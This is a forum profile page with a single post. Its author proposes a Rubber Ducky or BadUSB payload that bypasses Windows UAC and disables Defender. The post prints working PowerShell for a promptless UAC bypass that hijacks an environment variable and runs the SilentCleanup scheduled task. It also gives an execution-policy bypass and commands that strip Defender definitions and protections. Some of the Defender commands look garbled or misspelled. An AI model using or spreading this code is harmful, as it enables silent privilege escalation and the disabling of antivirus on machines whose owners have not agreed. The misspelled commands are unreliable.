Jump to content

ramirez.r1214

Members
  • Content Count

    0
  • Joined

  • Last visited

About ramirez.r1214

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. So I had an Idea recently not sure if it'll work don't bash me on it but I was thinking about combining some of darrens videos and using a bad usb or a rubber ducky to not only bypass uac but turn off defender I been trying this for some time now trying this on my virtual box and windows 10 laptop.In one of his videos he shows Promptless UAC Bypass & Powershell Privilege Escalation. ~~~~~~~~~~~~~~~~~~~~~ if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } ~~~~~~~~~~~~~~~~~~~~~~ (what I have learned from running this in a notepad then saving as a uac.ps1 but before executing the uac.ps1 you need to run "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass" and select yes to avoid the "script is not signed" error) also using the code from Disabling Defender With Viss Episode 1 showed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "c\program files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All set-MpPreference -DisableIOVProtection $true ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ disabling defender but it needs to be run in the admin CMD what I am thinking here is some how coding a rubber ducky in to first bypassing uac then disabling windows defender That way you can begin and have fun with your unlocked unprotected machine. Once again just an idea I have no clue if its possible or makes sense. But id really love to try.
×
×
  • Create New...